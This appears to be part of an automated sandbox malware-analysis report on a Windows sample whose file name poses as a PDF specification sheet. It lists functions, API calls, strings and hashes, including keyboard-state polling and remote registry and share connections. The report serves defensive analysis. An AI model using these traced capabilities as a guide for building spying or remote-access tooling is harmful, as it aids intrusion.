                                      • GetDlgCtrlID.USER32(00000000), ref: 003AEF56
                                      • GetMenuItemInfoW.USER32 ref: 003AF0AC
                                      • GetMenuItemCount.USER32(00000000), ref: 003AF0CC
                                      • GetMenuItemID.USER32(?,00000000), ref: 003AF0DF
                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003AF113
                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003AF15B
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AF193
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AF1C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                      • String ID: 0
                                      • API String ID: 1026556194-4108050209
                                      • Opcode ID: c311d31d9cb3f6c35060d11e79bfe12ddc08c4bccca3ce81d718827cc8a7da09
                                      • Instruction ID: c118fa3f28f5c6f248c1af544dc5339da8f0344686dc9b301d4de187874a10a6
                                      • Opcode Fuzzy Hash: c311d31d9cb3f6c35060d11e79bfe12ddc08c4bccca3ce81d718827cc8a7da09
                                      • Instruction Fuzzy Hash: 7B817B71608301AFDB22CF54CC84E6BBBE9FB8A314F01492EF99997291D771D905CB92
                                      Function 00387AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00387B42
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00387B58
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00387B69
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00387B7B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00387B8C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: SendString
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 890592661-1007645807
                                      • Opcode ID: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                      • Instruction ID: 40aebea6e854e3eb30376271a99cdf79985711f00e30c51b4c1fa4d8290d4a27
                                      • Opcode Fuzzy Hash: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                      • Instruction Fuzzy Hash: 3A11C4B0A5025D79D723B761CC4ADFFBABDEB91B40F100419B511AA0D1DA706A49CAB0
                                      Function 0038778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00387794
                                        • Part of subcall function 0035DC38: timeGetTime.WINMM(?,76179610,003B58AB), ref: 0035DC3C
                                      • Sleep.KERNEL32(0000000A), ref: 003877C0
                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003877E4
                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00387806
                                      • SetActiveWindow.USER32 ref: 00387825
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00387833
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00387852
                                      • Sleep.KERNEL32(000000FA), ref: 0038785D
                                      • IsWindow.USER32 ref: 00387869
                                      • EndDialog.USER32(00000000), ref: 0038787A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                      • Instruction ID: a86f71a1f049ec1066632c40eefbde938bc9bcef14019cfd6d66270620552d9e
                                      • Opcode Fuzzy Hash: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                      • Instruction Fuzzy Hash: F7211870204305AFE7066F20AD89F263F6EFB4534AF1500B8F91696162CB71AD14DB29
                                      Function 003855BD Relevance: 18.2, APIs: 12, Instructions: 213windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00385664
                                      • GetMenuItemCount.USER32(00401708), ref: 003856ED
                                      • DeleteMenu.USER32(00401708,00000005,00000000,000000F5,?,?), ref: 0038577D
                                      • DeleteMenu.USER32(00401708,00000004,00000000), ref: 00385785
                                      • DeleteMenu.USER32(00401708,00000006,00000000), ref: 0038578D
                                      • DeleteMenu.USER32(00401708,00000003,00000000), ref: 00385795
                                      • GetMenuItemCount.USER32(00401708), ref: 0038579D
                                      • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 003857D3
                                      • GetCursorPos.USER32(?), ref: 003857DD
                                      • SetForegroundWindow.USER32(00000000), ref: 003857E6
                                      • TrackPopupMenuEx.USER32(00401708,00000000,?,00000000,00000000,00000000), ref: 003857F9
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00385805
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID:
                                      • API String ID: 1441871840-0
                                      • Opcode ID: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                      • Instruction ID: 5d43ec4da994b42506c844ce202a057e3678ef3da98df65cc2214e961a418ae8
                                      • Opcode Fuzzy Hash: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                      • Instruction Fuzzy Hash: 5B710330640B05BFEB23AB54DC49FAABF69FF00368F644256F618AA1E0D7716C10DB90
                                      Function 00382E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00382ED6
                                      • SetKeyboardState.USER32(?), ref: 00382F41
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00382F61
                                      • GetKeyState.USER32(000000A0), ref: 00382F78
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00382FA7
                                      • GetKeyState.USER32(000000A1), ref: 00382FB8
                                      • GetAsyncKeyState.USER32(00000011), ref: 00382FE4
                                      • GetKeyState.USER32(00000011), ref: 00382FF2
                                      • GetAsyncKeyState.USER32(00000012), ref: 0038301B
                                      • GetKeyState.USER32(00000012), ref: 00383029
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00383052
                                      • GetKeyState.USER32(0000005B), ref: 00383060
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                      • Instruction ID: 2d4c0220f3c3a9c572ca3773be57b7c72f2000cdc49e19bcd234cdbf4c5efcc6
                                      • Opcode Fuzzy Hash: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                      • Instruction Fuzzy Hash: 3A51C670A0478429FB37FBA488107ABBBF49F11740F0945DED5C25A6C2DA54AB8CC7A6
                                      Function 0037ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0037ED1E
                                      • GetWindowRect.USER32(00000000,?), ref: 0037ED30
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037ED8E
                                      • GetDlgItem.USER32(?,00000002), ref: 0037ED99
                                      • GetWindowRect.USER32(00000000,?), ref: 0037EDAB
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037EE01
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EE0F
                                      • GetWindowRect.USER32(00000000,?), ref: 0037EE20
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037EE63
                                      • GetDlgItem.USER32(?,000003EA), ref: 0037EE71
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037EE8E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0037EE9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                      • Instruction ID: 9426fd1ef48f60f44216bf33655733ba9623656182c41716dd5fcbeda9460554
                                      • Opcode Fuzzy Hash: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                      • Instruction Fuzzy Hash: 5A512DB1B00205AFDB19CF68DD89EAEBBBAEB88300F558579F519D7290D774AD00CB10
                                      Function 0035B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0035B72B), ref: 0035B7F6
                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 0035B88D
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 003BD8A6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8D7
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8EE
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD90A
                                      • DeleteObject.GDI32(00000000), ref: 003BD91C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                      • Instruction ID: ec38a6e1bfc075ea41da1571d9ed2c99e5e4488c14e25ae732340ee18030fb38
                                      • Opcode Fuzzy Hash: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                      • Instruction Fuzzy Hash: DC619A30501600DFDB279F18DD88F65B7B9FF84316F16092DE9869AA70C731B898CB44
                                      Function 0035B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                      • GetSysColor.USER32(0000000F), ref: 0035B438
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                      • Instruction ID: 8de47422931f62ebe96bab2a75d272ace3ad1773602fff74df708fca14600194
                                      • Opcode Fuzzy Hash: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                      • Instruction Fuzzy Hash: 1241CF70000100AFDB325F29DC89FB97B6AAB06732F198265FEA58E5F2D7309C45CB21
                                      Function 0037CF50 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037CF91
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037D09A
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0037D10D
                                      • GetDlgCtrlID.USER32(?), ref: 0037D15F
                                      • GetWindowRect.USER32(?,?), ref: 0037D195
                                      • GetParent.USER32(?), ref: 0037D1B3
                                      • ScreenToClient.USER32(00000000), ref: 0037D1BA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037D234
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0037D26E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                      • String ID: %s%u
                                      • API String ID: 1412819556-679674701
                                      • Opcode ID: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                      • Instruction ID: 0b8f76c16437af52a52560acc03b6ca6f295bc201bbd435b8cae06382826cd4b
                                      • Opcode Fuzzy Hash: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                      • Instruction Fuzzy Hash: 0CA1CF31204306AFD726DF64C884FAAB7E8FF44314F008929F99DD6191EB34EA56CB91
                                      Function 0037D8A7 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0037D8EB
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037D924
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0037D941
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0037D9A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037D9DF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0037DA28
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0037DA60
                                      • GetWindowRect.USER32(00000004,?), ref: 0037DAC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 3725905772-1539354611
                                      • Opcode ID: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                      • Instruction ID: 6f339d26bf3c7a0734b8863c596734635a60832793add35a6e293d3723c2c10b
                                      • Opcode Fuzzy Hash: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                      • Instruction Fuzzy Hash: 038191310083059BDB22DF14C985FAA7BE8FF85314F058469FD8A9A095DB38ED45CBA1
                                      Function 003826BC Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?), ref: 003826F1
                                      • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 003826FA
                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?,00000016), ref: 0038271C
                                      • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 0038271F
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00382840
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 4072794657-2268648507
                                      • Opcode ID: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                      • Instruction ID: 03e145cb53fb231d1b6e47cb7af041c1b680fbab1168300a674058b15c369d34
                                      • Opcode Fuzzy Hash: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                      • Instruction Fuzzy Hash: 1741EC72800219BACF16FBE0DD86DEEB7B8AF15340F500065B6057E092EA756F59CB61
                                      Function 0037A14D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0037A211
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037A22D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037A249
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0037A273
                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037A29B
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2A6
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 3030280669-22481851
                                      • Opcode ID: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                      • Instruction ID: d45a8476629a2115f15b49067827afa6332355aa2cd5ba1c1bb555689f0b1da9
                                      • Opcode Fuzzy Hash: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                      • Instruction Fuzzy Hash: 8741F476C10629ABDF22EBA4DC85DEEB7B8FF04340F014429F905BB161EA74AE05CB51
                                      Function 003AA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003AA259
                                      • CreateCompatibleDC.GDI32(00000000), ref: 003AA260
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003AA273
                                      • SelectObject.GDI32(00000000,00000000), ref: 003AA27B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003AA286
                                      • DeleteDC.GDI32(00000000), ref: 003AA28F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003AA299
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003AA2AD
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003AA2B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 041409e54fae22aed0fa3af65702bca7ded3fa5cf98f146d0e261d1644556083
                                      • Instruction ID: afbf5821ba689a1e536718972d4b33848f4f852453791812b40b4415788d2396
                                      • Opcode Fuzzy Hash: 041409e54fae22aed0fa3af65702bca7ded3fa5cf98f146d0e261d1644556083
                                      • Instruction Fuzzy Hash: E7314F32100515ABDF225FA5DC49FEA3B6DFF0A760F110628FA19E61A0C736E821DB65
